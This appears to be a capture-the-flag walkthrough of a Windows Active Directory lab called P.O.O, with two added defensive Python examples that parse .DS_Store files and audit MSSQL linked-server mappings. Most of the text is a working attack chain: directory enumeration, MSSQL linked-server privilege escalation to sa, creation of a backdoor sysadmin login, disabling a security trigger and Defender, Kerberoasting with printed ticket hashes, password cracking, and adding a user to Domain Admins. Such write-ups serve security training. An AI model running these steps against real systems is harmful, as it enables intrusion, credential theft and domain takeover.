P.O.O
Entry Point
10.13.38.11
Let's start with our initial nmap scan
sudo nmap -p- --min-rate 1500 -T4 10.13.38.11 | grep '^[0-9]' | cut -d"/" -f1 | tr '\n' ','
we have the following ports open on the target machine 10.13.38.11
80,1433
Let's run a more in-depth scan of the target
sudo nmap -sCV -p80,1433 10.13.38.11 -oA 10.13.38.11_tcp
results
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.2027.00; RTM+
| ms-sql-info:
| 10.13.38.11:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM+
| number: 14.00.2027.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: true
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.13.38.11:1433:
| Target_Name: POO
| NetBIOS_Domain_Name: POO
| NetBIOS_Computer_Name: COMPATIBILITY
| DNS_Domain_Name: intranet.poo
| DNS_Computer_Name: COMPATIBILITY.intranet.poo
| DNS_Tree_Name: intranet.poo
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-01-19T03:16:01
|_Not valid after: 2054-01-19T03:16:01
|_ssl-date: 2024-01-19T12:27:43+00:00; +1s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
we can see:
an HTTP server, Microsoft IIS httpd 10.0
the domain name intranet.poo, which we can add to our hosts file
an MSSQL Server 2017 instance
Let's check out the webserver

Looks like a default IIS server
Let's run feroxbuster and see if we can discover anything
feroxbuster -u http://intranet.poo -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -o 10.13.38.11_dirs.txt -x asp,aspx
Let's check for any vhosts
wfuzz -c -f sub-fighter -u '10.13.38.11' -H 'Host:FUZZ.intranet.poo' -w /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt | grep -v "703 Ch"
Nothing interesting
Let's run nikto to see if we can find any vulnerabilities
nikto --url http://intranet.poo
we do see something interesting

We can see the web server has a .DS_Store file within the server's root directory
What is a .DS_Store file?
It is a hidden file that is automatically created by the macOS operating system when a user opens a folder with the Finder application. The file contains information about which files are in the folder, along with options such as what the icons look like.
Why do we care?
here is a great blog that can explain that better than myself
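As an added illustration of the format (example code written for this page, not ds_walk or anything from the lab), here is a small Python scanner that pulls the entry names out of a .DS_Store blob the way such parsers do: instead of walking the file's B-tree it looks for the record layout Finder writes, a length-prefixed UTF-16BE name followed by a four-character structure id and structure type, and skips each record's payload. It runs over a constructed sample; the Bud1 header, the record ids and the names in that sample are made up for the example. A defender can run the same function over their own webroot to see exactly which names a leaked file would disclose.

```python
import struct

# Structure types a .DS_Store record can carry, and the payload size that
# follows each fixed-size type (blob and ustr carry their own length prefix).
DS_TYPES = {b"long", b"shor", b"bool", b"blob", b"type", b"ustr", b"comp", b"dutc"}
FIXED_SIZES = {b"long": 4, b"shor": 4, b"bool": 1, b"type": 4, b"comp": 8, b"dutc": 8}


def _parse_record(data, i):
    """Try to read one record at offset i: uint32 name length (UTF-16 code
    units), the name in UTF-16BE, a 4-byte structure id and a 4-byte type.
    Returns (name, next_offset) or None if the bytes do not form a record."""
    if i + 4 > len(data):
        return None
    n = struct.unpack(">I", data[i:i + 4])[0]
    if not 1 <= n <= 255:
        return None
    end = i + 4 + 2 * n
    if end + 8 > len(data):
        return None
    try:
        name = data[i + 4:end].decode("utf-16-be")
    except UnicodeDecodeError:
        return None
    if not all(c.isprintable() for c in name):
        return None
    struct_id, struct_type = data[end:end + 4], data[end + 4:end + 8]
    if not struct_id.isalnum() or struct_type not in DS_TYPES:
        return None
    pos = end + 8
    if struct_type in FIXED_SIZES:
        pos += FIXED_SIZES[struct_type]
    else:  # blob and ustr are length-prefixed
        if pos + 4 > len(data):
            return None
        length = struct.unpack(">I", data[pos:pos + 4])[0]
        pos += 4 + (2 * length if struct_type == b"ustr" else length)
    return name, min(pos, len(data))  # clamp so a truncated file still yields its names


def extract_names(data):
    """Scan a .DS_Store blob and return the unique entry names, in order.
    Scanning byte by byte for well-formed records (rather than walking the
    allocator and B-tree) also makes partially downloaded files usable."""
    names = {}
    i = 0
    while i < len(data):
        rec = _parse_record(data, i)
        if rec is None:
            i += 1
            continue
        name, i = rec
        names[name] = True
    return list(names)


def _record(name, struct_id, struct_type, payload):
    """Build one record for the constructed sample below."""
    enc = name.encode("utf-16-be")
    return struct.pack(">I", len(enc) // 2) + enc + struct_id + struct_type + payload


# Constructed sample (not a real file from the lab): the Bud1 magic header,
# padding, and a handful of records like the ones Finder writes.
SAMPLE_DS_STORE = (
    b"\x00\x00\x00\x01Bud1" + b"\x00" * 16
    + _record("admin", b"Iloc", b"blob", struct.pack(">I", 16) + b"\x00" * 16)
    + _record("admin", b"bwsp", b"bool", b"\x01")  # second record for the same entry
    + _record("dev", b"Iloc", b"blob", struct.pack(">I", 16) + b"\x00" * 16)
    + _record("web.config", b"ptbN", b"ustr", struct.pack(">I", 3) + "abc".encode("utf-16-be"))
    + _record("New folder (2)", b"vSrn", b"long", b"\x00\x00\x00\x01")
    + b"\x00" * 8
)

if __name__ == "__main__":
    for entry in extract_names(SAMPLE_DS_STORE):
        print(entry)
```

Pointing the function at a file fetched from your own server (open(path, "rb").read()) lists the names it leaks; an empty list means no recognisable records, which is what you want to see from anything reachable over HTTP.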
We can utilize the following parser to enumerate the .DS_Store file
sudo python /opt/DS_Walk/ds_walk.py -u http://intranet.poo
results
[!] .ds_store file is present on the webserver.
[+] Enumerating directories based on .ds_server file:
----------------------------
[!] http://intranet.poo/admin
[!] http://intranet.poo/dev
[!] http://intranet.poo/iisstart.htm
[!] http://intranet.poo/Images
[!] http://intranet.poo/JS
[!] http://intranet.poo/META-INF
[!] http://intranet.poo/New folder
[!] http://intranet.poo/New folder (2)
[!] http://intranet.poo/Plugins
[!] http://intranet.poo/Templates
[!] http://intranet.poo/Themes
[!] http://intranet.poo/Uploads
[!] http://intranet.poo/web.config
[!] http://intranet.poo/Widgets
----------------------------
[!] http://intranet.poo/dev/304c0c90fbc6520610abbf378e2339d1
[!] http://intranet.poo/dev/dca66d38fd916317687e1390a420c3fc
----------------------------
[!] http://intranet.poo/dev/304c0c90fbc6520610abbf378e2339d1/core
[!] http://intranet.poo/dev/304c0c90fbc6520610abbf378e2339d1/db
[!] http://intranet.poo/dev/304c0c90fbc6520610abbf378e2339d1/include
[!] http://intranet.poo/dev/304c0c90fbc6520610abbf378e2339d1/src
----------------------------
[!] http://intranet.poo/dev/dca66d38fd916317687e1390a420c3fc/core
[!] http://intranet.poo/dev/dca66d38fd916317687e1390a420c3fc/db
[!] http://intranet.poo/dev/dca66d38fd916317687e1390a420c3fc/include
[!] http://intranet.poo/dev/dca66d38fd916317687e1390a420c3fc/src
----------------------------
[!] http://intranet.poo/Images/buttons
[!] http://intranet.poo/Images/icons
[!] http://intranet.poo/Images/iisstart.png
----------------------------
[!] http://intranet.poo/JS/custom
----------------------------
[!] http://intranet.poo/Themes/default
----------------------------
[!] http://intranet.poo/Widgets/CalendarEvents
[!] http://intranet.poo/Widgets/Framework
[!] http://intranet.poo/Widgets/Menu
[!] http://intranet.poo/Widgets/Notifications
----------------------------
[!] http://intranet.poo/Widgets/Framework/Layouts
----------------------------
[!] http://intranet.poo/Widgets/Framework/Layouts/custom
[!] http://intranet.poo/Widgets/Framework/Layouts/default
----------------------------
we can see a number of interesting entries such as dev and admin
when we navigate to http://intranet.poo/admin, we are greeted with a login prompt

we need a way of finding the admin's credentials
after some googling we do find this
essentially we can utilize the "~" tilde to enumerate files and folders on the IIS server: the tilde lets us discover the first six characters of file and folder names along with their extensions (the 8.3 short names)
we can utilize the following tool
shortscan http://intranet.poo/dev/304c0c90fbc6520610abbf378e2339d1/db
results

We need to find the missing characters; we can use wfuzz for this
we can see the http://intranet.poo/dev/304c0c90fbc6520610abbf378e2339d1/ contains a file poo_co*.txt
we need to find the rest of the filename
create a wordlist
grep '^co.*' /opt/
running wfuzz
wfuzz -c -u "http://intranet.poo/dev/304c0c90fbc6520610abbf378e2339d1/db/poo_FUZZ.txt" -w ./fuzz.txt -t 20 --hc 404
we do find one 200 response

navigating to
we can see the following

SERVER=10.13.38.11
USERID=external_user
DBNAME=POO_PUBLIC
USERPWD=#p00Public3xt3rnalUs3r#
Flag : POO{flag}
Let's see if we can authenticate to the MSSQL server
sudo python2 /opt/impacket-0.9.19/examples/mssqlclient.py 'external_user:#p00Public3xt3rnalUs3r#@10.13.38.11'

first I want to see if I can run commands with xp_cmdshell
enable_xp_cmdshell

no luck
Let's conduct some basic enumeration
MSSQL version
select @@version;

List the databases
select name from master.dbo.sysdatabases;

current database
select db_name();

couldn't find anything too interesting
We could utilize an MSSQL server link and point it to an external source
Let's find our current server's name
select @@servername;

we can check for linked servers by querying the sysservers table
select srvname from sysservers;

we can see there is another linked remote server, POO_CONFIG
we can utilize EXECUTE ... AT to run queries on other servers, for example:
EXECUTE ('select @@servername;') at [COMPATIBILITY\POO_CONFIG]

after enumerating further there wasn't anything too interesting
Let's see if we can get POO_CONFIG to execute queries on POO_PUBLIC
EXECUTE ('EXECUTE (''select suser_name();'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];

Notice how the command ran as the 'sa' user. From what I can tell this is most likely a configuration issue: the first link allows any user on POO_PUBLIC to run queries on POO_CONFIG as the internal user, but the second link looks like it allows any user from POO_CONFIG to run queries on POO_PUBLIC as the 'sa' user.
we can confirm this when we check our permissions through POO_CONFIG -> POO_PUBLIC
EXECUTE ('EXECUTE (''SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''''SERVER'''');'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
entity_name permission_name
-------------------------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------
server CONNECT SQL
server SHUTDOWN
server CREATE ENDPOINT
server CREATE ANY DATABASE
server CREATE AVAILABILITY GROUP
server ALTER ANY LOGIN
server ALTER ANY CREDENTIAL
server ALTER ANY ENDPOINT
server ALTER ANY LINKED SERVER
server ALTER ANY CONNECTION
server ALTER ANY DATABASE
server ALTER RESOURCES
server ALTER SETTINGS
server ALTER TRACE
server ALTER ANY AVAILABILITY GROUP
server ADMINISTER BULK OPERATIONS
server AUTHENTICATE SERVER
server EXTERNAL ACCESS ASSEMBLY
server VIEW ANY DATABASE
server VIEW ANY DEFINITION
server VIEW SERVER STATE
server CREATE DDL EVENT NOTIFICATION
server CREATE TRACE EVENT NOTIFICATION
server ALTER ANY EVENT NOTIFICATION
server ALTER SERVER STATE
server UNSAFE ASSEMBLY
server ALTER ANY SERVER AUDIT
server CREATE SERVER ROLE
server ALTER ANY SERVER ROLE
server ALTER ANY EVENT SESSION
server CONNECT ANY DATABASE
server IMPERSONATE ANY LOGIN
server SELECT ALL USER SECURABLES
server CONTROL SERVER
we can see we have ALL the permissions
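Here is an added example (not from the lab or from any tool used above) that models the misconfiguration just described as a graph and audits it in Python. The link rows are an assumption written to match the behaviour observed on this box (the login name internal_user and the fixed-configuration login config_reader are made up); on a real instance a DBA would build them from the catalog views sys.servers and sys.linked_logins, where local_principal_id = 0 is the catch-all mapping modelled here as "*". The search generalises to link chains of any length, not just the two-hop loop on this box, and FIXED_LINKS shows the mapping that closes the path.

```python
from collections import deque

# Constructed model of the lab's linked-server login mappings (an assumption
# matching what was observed above, not a dump of sys.servers/sys.linked_logins).
# local_login "*" is the catch-all mapping that applies to every local login.
LINKS = [
    # (local_server, local_login, remote_server, remote_login)
    ("COMPATIBILITY\\POO_PUBLIC", "*", "COMPATIBILITY\\POO_CONFIG", "internal_user"),
    ("COMPATIBILITY\\POO_CONFIG", "*", "COMPATIBILITY\\POO_PUBLIC", "sa"),
]
# The same topology with the return link mapped to a low-privilege login instead of sa.
FIXED_LINKS = [
    LINKS[0],
    ("COMPATIBILITY\\POO_CONFIG", "*", "COMPATIBILITY\\POO_PUBLIC", "config_reader"),
]
SYSADMIN_LOGINS = {"sa"}


def find_escalation_paths(links, start_server, start_login, sysadmin_logins, max_hops=6):
    """Breadth-first search over linked-server login mappings.
    A state is (server, login); following a link moves to (remote_server,
    remote_login).  Returns every path from the starting context that ends
    on a sysadmin login, including loops back to the server you started on."""
    start = (start_server, start_login)
    queue = deque([[start]])
    found = []
    while queue:
        path = queue.popleft()
        server, login = path[-1]
        if len(path) - 1 >= max_hops:
            continue
        for local_server, local_login, remote_server, remote_login in links:
            if local_server != server or local_login not in ("*", login):
                continue
            nxt = (remote_server, remote_login)
            if nxt in path:  # already on this path: do not cycle forever
                continue
            new_path = path + [nxt]
            if remote_login in sysadmin_logins:
                found.append(new_path)
            else:
                queue.append(new_path)
    return found


def risky_links(links, sysadmin_logins):
    """Flag links whose catch-all mapping lands on a sysadmin login: the
    setting that turns any local login into sa on the remote side."""
    return [link for link in links if link[1] == "*" and link[3] in sysadmin_logins]


if __name__ == "__main__":
    for path in find_escalation_paths(LINKS, "COMPATIBILITY\\POO_PUBLIC", "external_user", SYSADMIN_LOGINS):
        print(" -> ".join("%s as %s" % hop for hop in path))
    print("risky links:", risky_links(LINKS, SYSADMIN_LOGINS))
    print("paths after fix:", find_escalation_paths(FIXED_LINKS, "COMPATIBILITY\\POO_PUBLIC", "external_user", SYSADMIN_LOGINS))
```

The two checks answer different questions: risky_links is the one-line finding to put in an audit report, while find_escalation_paths shows the concrete route a low-privilege login would take, which is what makes the loop through POO_CONFIG and back visible.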
Let's create a new login with 'sa'-level (sysadmin) permissions and a password so we don't have to keep relying on server links
creating a user
EXECUTE('EXECUTE(''CREATE LOGIN shrek123 WITH PASSWORD = ''''qwe123QWE!@#'''';'') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG]
giving our user the necessary permissions
EXECUTE('EXECUTE(''EXEC sp_addsrvrolemember ''''shrek123'''', ''''sysadmin'''''') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG]

Let's log in with our newly created user
sudo python2 /opt/impacket-0.9.19/examples/mssqlclient.py 'shrek123:qwe123QWE!@#@10.13.38.11'
we are now logged in as a systems administrator
reading the flag
select name from master..sysdatabases;
select table_name,table_schema from flag.INFORMATION_SCHEMA.Tables;
Let's enable xp_cmdshell
enable_xp_cmdshell
xp_cmdshell whoami

Note: server triggers are essentially a policy put in place to alert on and block attempts at certain actions, such as enabling xp_cmdshell. These triggers are listed in sys.server_triggers, and we can disable them with
DISABLE TRIGGER ALERT_xp_cmdshell ON ALL SERVER;
Now that we have command execution, our next bet will be to establish a reverse shell on the system
Let's check out the web.config file
xp_cmdshell type C:\inetpub\wwwroot\web.config

Alright, I want to try and find a way to access this file
Fun fact: when the SQL server is enabled to run the stored procedure sp_execute_external_script, it runs the script as a different user, so let's try and use this particular procedure to run a simple Python script
execute sp_execute_external_script @language =N'Python',@script=N'import os; os.system("whoami");';
we can see this procedure is running as the user poo_public01

Let's see if we can read the web.config file now
execute sp_execute_external_script @language =N'Python',@script=N'import os; os.system("type C:\inetpub\wwwroot\web.config");';
and we now have the contents of the web.config file
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <staticContent>
      <mimeMap fileExtension=".DS_Store" mimeType="application/octet-stream" />
    </staticContent>
    <!--
    <authentication mode="Forms">
      <forms name="login" loginUrl="/admin">
        <credentials passwordFormat="Clear">
          <user name="Administrator" password="EverybodyWantsToWorkAtP.O.O." />
        </credentials>
      </forms>
    </authentication>
    -->
  </system.webServer>
</configuration>
Let's try these creds at the /admin login prompt we found earlier
they work

I don't see a way to get a foothold from this page, so let's go back to our mssql client and enumerate the machine further
execute sp_execute_external_script @language =N'Python',@script=N'import os; os.system("ipconfig");';
we do find an IPv6 address

dead:beef::1001
Let's see what nmap can find on this address
sudo nmap -A -6 -p- --min-rate 10000 dead:beef::1001
results
Host is up (0.30s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Bad Request
| http-server-header:
| Microsoft-HTTPAPI/2.0
|_ Microsoft-IIS/10.0
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.2027.00; RTM+
| ms-sql-ntlm-info:
| dead:beef::1001:1433:
| Target_Name: POO
| NetBIOS_Domain_Name: POO
| NetBIOS_Computer_Name: COMPATIBILITY
| DNS_Domain_Name: intranet.poo
| DNS_Computer_Name: COMPATIBILITY.intranet.poo
| DNS_Tree_Name: intranet.poo
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-01-19T03:16:01
|_Not valid after: 2054-01-19T03:16:01
|_ssl-date: 2024-01-20T02:31:26+00:00; +2s from scanner time.
| ms-sql-info:
| dead:beef::1001:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM+
| number: 14.00.2027.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: true
|_ TCP port: 1433
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
Device type: general purpose
Running: Microsoft Windows 10
OS CPE: cpe:/o:microsoft:windows_10
OS details: Microsoft Windows 10
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
TRACEROUTE
HOP RTT ADDRESS
1 297.48 ms dead:beef::1001
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.85 seconds
we can see WinRM is enabled, meaning we should be able to use evil-winrm and gain access to the machine
we need to add the hostname and IP address to our hosts file
execute sp_execute_external_script @language =N'Python',@script=N'import os; os.system("hostname");';
COMPATIBILITY
Now we should be able to WinRM into the machine
evil-winrm -i COMPATIBILITY -u administrator -p 'EverybodyWantsToWorkAtP.O.O.'
it worked

Now we need to find a way of pivoting
we can upload SharpHound.exe via WinRM, but when we try to execute the tool we encounter some problems: since Administrator is not a domain account we can't query the domain. So we will run SharpHound.exe via our mssql client instead, since through shrek123 we have access to a service account and can impersonate a computer account, which can query the domain
upload SharpHound.exe via winrm
cd C:\Users\Public
upload SharpHound.exe

execute SharpHound.exe via mssqlclient
xp_cmdshell C:\Users\Public\SharpHound.exe -C All --outputdirectory C:\Users\Public

Now we can download the output zip file onto our local machine and ingest it into BloodHound
download 20240120055112_BloodHound.zip
Looking through BloodHound, within the built-in query "Shortest Paths to Domain Admins from Kerberoastable Users" we can see

we can see the user P00_ADM@INTRANET.POO is a member of the help desk and has GenericAll privileges on the Domain Admins group, meaning we can add any member to the Domain Admins group
Let's perform some Kerberoasting on the user P00_ADM@INTRANET.POO
we will utilize the Invoke-Kerberoast.ps1 script from
Before we run the PowerShell script via WinRM, let's turn off Defender to be safe
Set-MpPreference -DisableRealTimeMonitoring $true

Now we can upload the script
upload Invoke-Kerberoast.ps1
Now, just like with SharpHound, we are going to utilize our mssqlclient session to execute the script
xp_cmdshell powershell -c import-module c:\programdata\invoke-kerberoast.ps1; invoke-kerberoast -outputformat hashcat
results
output
--------------------------------------------------------------------------------
NULL
NULL
TicketByteHexStream :
Hash : $krb5tgs$23$*p00_hr$intranet.poo$HR_peoplesoft/intranet.poo:1433*$EB1AEBE78B878A5F003B4181534EEB
8E$486776D2198FDC0871DD2F27802D2F7B078EDDA8A080D3B7C7A459F5DBA2B071FBB3CA5D0817AD590C1C08EA372DE
FB79E76D979DD39B9B209B33394D22F388EBA8F1FB28F4C883A4C394A72C230DCDFC0094EAF988CBCC6F3BDA0E98CF92
5ED5DD3369C1488A8E85AE60E35A7EB80EF509653849DC1D276F924E1E72861E86B55F0A96AE7284D31A7435F9FF6D7F
62C55C8C8B3041398BB1226E633AC663365188F131AB502D444A4DFB7FE2E6729AFBAC67618019B23835CC60BCC0A37C
8FF2ABF381AED944618268A22133E78E10B656E4E2870CBF571D87338842AAC3DA2E1716A22532ABAC398329101A6DBA
B625B754E293AF3CAEECB9949CF13F1DC35FD84E20CBB992E546289BF126E3C9BC513DB10D1D297DAAFA2FEBB905383F
9C4F2686DAAEE3846B7623727C103668F75792766E8F008A9C049A99FBDAA540AD8610743B486C9C3C77EBDDDAFDC885
27FCBAB63ABAB2C8E804B90DE973AC83F2CA3EC5B0FDEA8DED92E383A15DFB92FE9945505C22246776E611BD3BC6F061
B4A66310E152EE51C6AB0028604F33EE94313CA0109B9B7DC16D6EE77A3B5021EF633D4E87F281F8BC055FD19DB37B02
0158797221D6BD0794E5AA88DD524889C7FDB61581C927CB84D576C17FDDBFF0E54A4C0AF3322A3C5833478FBDB823F2
5FA500D5044DC0F32F3EBAD797461625EAE3E96934505A259F0BC6F937A9FF53F05E7552587AE10F9E05E96A9C31231D
E15F97166043AE950695E978A32E3F4AF543D691F60BC5D76ED546C2615A06206590535D1B0DE5A8D1F0F3E878194A8B
F33ACECAC0331BD7CC7F9BB5D487D550A4B71FADBBFFE9B9908794BC73FE53A1800CB92F5375B72CC6DD2DC7DF19E1AC
00AABB5A89B35BBB149329473369DEBA7B60CA05AC345327D7AE7E7004AB9C949BB99238FCD8A01B51A3E5FA01131170
FA45604743F217EF518A3594DF05B89DD3F639BAF603E04E8D603414EAF181CA1F1B90AE03F31E997D504CA9BE0A727F
44832AA4FA3B769995837151FC476D76FFFAAA7914B367A40E3F7F683C6159C540401DE3A7C2DA132F8FF6A029BA548C
EF0456E941D8D64B4B2529E20DD87008044D320FDE3EB8AF1C638421AAB3DF883C3C7D389D9BB015811C77D5C05C8764
25A32D4DD97DF8312C0DEE98A42D0476E9670E046E21055FE2AE979F8F37EEE52C0265160FFA290EFA0268521A76F46A
35CB960DCB33F46C8BA5A5D23058AD1AE7501A0366E87870C7C487E43433C5872E6786EDCAEECC468E817685D6A5C485
1622A629E8E2EE422AB305474216EF670677B27563EC9431EBC3F2B45295C3B847C0FD3F45BF8BEAE40DBFEE925BE046
F4A7668D49A9E330C2B22ECD99D09333576DC510B99C3C9A3D2ACE5EB1AF4E5FFA7E1A0837D625BB08D2E35D2ED35F89
2C0ECE21DC9A65A8A68892B581CC8BAA744F4081B4B00C2B08579526D162E4190C5B388350D9F3456D819207C2BDF
SamAccountName : p00_hr
DistinguishedName : CN=p00_hr,CN=Users,DC=intranet,DC=poo
ServicePrincipalName : HR_peoplesoft/intranet.poo:1433
NULL
TicketByteHexStream :
Hash : $krb5tgs$23$*p00_adm$intranet.poo$cyber_audit/intranet.poo:443*$6531D8D31E5BCFC5A692FAC3B83B721C
$48E4F730BF9D08D72F218B9764AA435DE18E1A130EC729FB616FEA77AE35322B34D8942B6AAB60D4546EA9B59CCAA30
8AD57134EC5AF91337ED5B0A91BD390500444EED9164288986F8EB430A088F5EE66DDF275D607ADB279400E18F040C92
C90FFDF849DACB340F645BA24871BB50142681DE34E8E9ED43C2DAE687ABA1203BB25B32058985AFC71871E3109656D8
0F0C426AEA5DE1F68410F9A5EF7772C899A41CD3FF732FAE6DC7A0334DD102786B05C20CF92E5DE656DFF51DDA7F7081
53E26B194CCFA90A7CF7446C56DD12548383EDA97266EAF17E6EC6B11C2E74598C43A76800D245E12BA4D8E116DC15FA
B010F96C8BB827ABBA702EED1493A520E2B803EE23B5FCC802BE40B23EB1D97C64352F88556690C7B05C94D752C92118
3AB83A62AFB19160C81A627A9D5C09277BCAE39240362FE00545E030CE9CFC3959021B472C7E9201533DE5D06624739B
A9EA3EB87B0B47563D9BF097D3E52F09B13E6B8352728C75B23566ABFB23A7654749701FCE122EBEEC572DAF2C3C9496
472345E78A4BC06263D124D7E7270E9AB1E23875E85C280D9A99222753F4E348DE0007E78D9F650F540E11C55C4EAA1D
E9C15924C0A9A475CD0C9D5C5BF9CA8DF225E1E0E2AA56D7FA45C137209A8272FF177C21BEDBB58A153A810A056BD4E6
F1C5D59832635779B257A49C3CB29199E60925012E8371715C96AD5F1A8BD4D2C559C07D51A08C44444E3870CCA5B3B4
642987C8ABE1DCC028E4949A8D3CE4F16C4C5D3B387078299E259FFB61CECEDD16508E6554B299C290850903872AED0F
D3AC11E5CDD86D7FF9DB3D19D190FD78335D716CD753DD50A7F2DDAAC35F04684599823BFD5D4D10B1A71A8033C7B7F2
A2737AA9BD9BA79533C45D494E21DFE89DEDCDFB427E1E6E0F72C61711D81392677B5C5A4D1C0345E81B9EA03F632774
A0485250498C88A1B53ED1130C7CA17A0BE9CC797D6B88B5EE493735921AC563A11E76A28870550ACAA5EA7BE9D23C2F
F7C3074BD61BD0FD995753A17480A1814D394D3E24023B0307A49440CC79747F2AEED98ABD84816A94DEEC9587E4B098
5DE77784D8520AD5DA7460FF3DE26336401E49F689E3338FD0857CBFEAF251357E20A64AD68EB98B713451EA752147F4
1E4ED4307BE0B09BF4865A9B7EC931BCCCB9B7129E7E87E03AEDB73401F34E5101B2D380799EFE41EDB9298403D30218
F043DD3283DD801946BF09F163E37F0EF969F8FEFAAE2FA8975FF646613FF6F653F78C467BC45BC05D268B4EFEF5D62C
CD0F0B096690C315523798A78030EFA3519B78D55181FE9932A58EC346230A56D36AC4EFE6D8B546C9C4A51E8DF06206
EE3FE67770E351CA2894E3FCFCC4ACFB89CD8A2C43CEF8E6AB0DECBBDEF560261A2A59A523A0DA23E948B659CC3C4C0B
8F6445A7ABC4ED14D4E3B7FFBB117573D1D5F02010BD3B3F0EF0A36DCE9CBE32AA862E1A5E35825FD3A530014E9
SamAccountName : p00_adm
DistinguishedName : CN=p00_adm,CN=Users,DC=intranet,DC=poo
ServicePrincipalName : cyber_audit/intranet.poo:443
NULL
NULL
NULL
NULL
we can see two accounts have returned a hash, let's utilize hashcat and crack these
To help clean the hash and get it ready for cracking
cat poo | tr -d '[:space:]'
tried to crack the hashes but no luck, maybe the hash broke somehow
Now we can crack it using hashcat
hashcat -m 13100 hash /usr/share/wordlists/seclists/SecLists-master/Passwords/Keyboard-Combinations.txt --force
we had to try a few different wordlists but eventually found it
creds
p00_adm: ZQ!5t4r
Now we can use p00_adm's account and add it to the Domain Admins group; then we can upload PowerView.ps1
Let's upload PowerView.ps1 via WinRM and import the module
upload PowerView.ps1
import-module .\PowerView.ps1
Let's create a PS credential
$Pass = ConvertTo-SecureString 'ZQ!5t4r' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('intranet.poo\p00_adm', $Pass)
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'p00_adm' -Credential $Cred
Now that p00_adm is part of the Domain Admins group, we can use the account to access the c$ share on the DC
net use \\DC.intranet.poo\c$ /u:intranet.poo\p00_adm 'ZQ!5t4r'
dir \\DC.intranet.poo\c$\users\
